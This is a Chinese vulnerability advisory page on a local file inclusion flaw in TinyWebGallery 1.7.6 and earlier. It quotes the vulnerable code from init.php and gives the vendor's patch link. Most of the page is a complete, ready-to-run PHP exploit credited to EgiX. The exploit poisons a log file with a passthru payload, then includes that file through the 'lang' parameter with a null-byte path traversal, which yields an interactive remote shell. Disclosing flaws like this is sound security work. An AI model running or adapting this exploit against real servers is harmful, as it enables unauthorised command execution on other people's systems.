安全研究
安全漏洞
TinyWebGallery /admin/_include/init.php模块本地文件包含漏洞
发布日期:2009-05-08
更新日期:2009-05-11
受影响系统:
Michael Dempfle TinyWebGallery <= 1.7.6 LFI不受影响系统:
Michael Dempfle TinyWebGallery 1.7.7描述:
BUGTRAQ ID: 34892
TinyWebGallery是基于php的开源相册。
TinyWebGallery的/admin/_include/init.php模块没有正确地验证用户请求中的$_GET['lang']参数:
110. // Get Language
111. if (isset($GLOBALS['__GET']["lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] = $GLOBALS['__GET']["lang"];
112. elseif (isset($GLOBALS['__POST']["lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"] = $GLOBALS['__POST']["lang"];
113. else if (isset($_SESSION["admin_lang"])) $GLOBALS["lang"] = $GLOBALS["language"] = $_SESSION["admin_lang"];
114. else $GLOBALS["language"] = $GLOBALS["default_language"];
115.
[...]
138.
139. // ------------------------------------------------------------------------------
140. // Necessary files
141. require _QUIXPLORER_PATH . "/_config/conf.php";
142.
143. if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php"))
144. require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["language"] . ".php";
145. else if (file_exists(_QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php"))
146. require _QUIXPLORER_PATH . "/_lang/" . $GLOBALS["default_language"] . ".php";
147. else
148. require _QUIXPLORER_PATH . "/_lang/en.php";
远程攻击者可以通过在144行的require函数包含任意文件。成功攻击要求magic_quotes_gpc = off。
<*来源:EgiX (n0b0d13s@gmail.com)
链接:http://www.milw0rm.com/exploits/8649
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
die("\nsocket_create(): " . socket_strerror($s) . "\n");
if (socket_connect($s, $host, 80) == false)
die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");
socket_write($s, $packet, strlen($packet));
while ($m = socket_read($s, 2048)) $response .= $m;
socket_close($s);
return $response;
}
function check_target()
{
global $host, $path;
$packet = "GET {$path}info.php?showphpinfo=true HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
preg_match('/magic_quotes_gpc<\/td><td class="v">(.*)<\/td><td/', http_send($host, $packet), $match);
if ($match[1] != "Off") die("\n[-] Exploit failed...magic_quotes_gpc = on\n");
}
function inject_code()
{
global $host, $path;
$code = "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${die} ?>";
$payload = "p_user={$code}&p_pass=";
$packet = "POST {$path}admin/index.php?action=login HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
http_send($host, $packet);
}
print "\n+---------------------------------------------------------------------+";
print "\n| TinyWebGallery <= 1.7.6 LFI / Remote Code Execution Exploit by EgiX |";
print "\n+---------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /twg/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
check_target();
inject_code();
$packet = "GET {$path}admin/index.php?lang=../../counter/_twg.log%%00 HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while (1)
{
print "\ntwg-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed...\n");
}
?>
建议:
厂商补丁:
Michael Dempfle
---------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.tinywebgallery.com/download.php?tinywebgallery=latest
浏览次数:3064
严重程度:0(网友投票)
绿盟科技给您安全的保障